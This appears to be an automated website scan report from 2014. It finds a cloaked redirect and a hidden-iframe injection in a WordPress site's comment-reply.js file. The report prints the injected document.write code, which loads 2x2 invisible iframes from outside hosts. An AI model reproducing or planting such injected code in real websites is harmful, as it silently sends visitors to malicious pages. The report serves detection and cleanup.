Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://myhrpartner.co.uk/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: myhrpartner.co.uk Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 16 Sep 2014 00:17:27 GMT Location: http://candice-accola.org/mocf.html?h=672978 Server: Apache Content-Length: 228 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://myhrpartner.co.uk/ | 200 OK Content-Length: 33284 Content-Type: text/html | clean |
http://myhrpartner.co.uk/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: application/javascript | clean |
http://myhrpartner.co.uk/wp-content/themes/modernize/javascript/cufon.js?ver=1.0 | 200 OK Content-Length: 41428 Content-Type: application/javascript | clean |
http://myhrpartner.co.uk/wp-content/themes/modernize/javascript/jquery.preloader.js?ver=1.0 | 200 OK Content-Length: 1962 Content-Type: application/javascript | clean |
http://myhrpartner.co.uk/wp-includes/js/comment-reply.js?ver=3.4 | 200 OK Content-Length: 1110 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=672978></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tucsonretreat.com/zhhd.html?j=1313987></iframe>'); addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I(" Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://tucsonretreat.com/zhhd.html?j=1313987 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tucsonretreat.com/zhhd.html?j=1313987> Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=672978 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=672978> | ||
http://myhrpartner.co.uk/wp-content/themes/modernize/javascript/cufon/Museo_Sans_500.font.js?ver=1.0 | 200 OK Content-Length: 133739 Content-Type: application/javascript | clean |
http://myhrpartner.co.uk/wp-content/themes/modernize/javascript/superfish.js?ver=1.0 | 200 OK Content-Length: 3712 Content-Type: application/javascript | clean |
http://myhrpartner.co.uk/wp-content/themes/modernize/javascript/supersub.js?ver=1.0 | 200 OK Content-Length: 3297 Content-Type: application/javascript | clean |
http://myhrpartner.co.uk/wp-content/themes/modernize/javascript/hoverIntent.js?ver=1.0 | 200 OK Content-Length: 3174 Content-Type: application/javascript | clean |
http://myhrpartner.co.uk/wp-content/themes/modernize/javascript/gdl-scripts.js?ver=1.0 | 200 OK Content-Length: 6392 Content-Type: application/javascript | clean |
http://myhrpartner.co.uk/wp-content/themes/modernize/javascript/jquery.easing.js?ver=1.0 | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://myhrpartner.co.uk/wp-content/themes/modernize/javascript/jquery.prettyPhoto.js?ver=1.0 | 200 OK Content-Length: 26201 Content-Type: application/javascript | clean |
http://myhrpartner.co.uk/wp-content/themes/modernize/javascript/jquery.nivo.slider.pack.js?ver=1.0 | 200 OK Content-Length: 25500 Content-Type: application/javascript | clean |
http://myhrpartner.co.uk/a-few-things-to-consider/ | 200 OK Content-Length: 300917 Content-Type: text/html | clean |
http://myhrpartner.co.uk/about/ | 200 OK Content-Length: 30838 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=myhrpartner.co.uk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://myhrpartner.co.uk/
Result: myhrpartner.co.uk is not infected or malware details are not published yet.
Result: myhrpartner.co.uk is not infected or malware details are not published yet.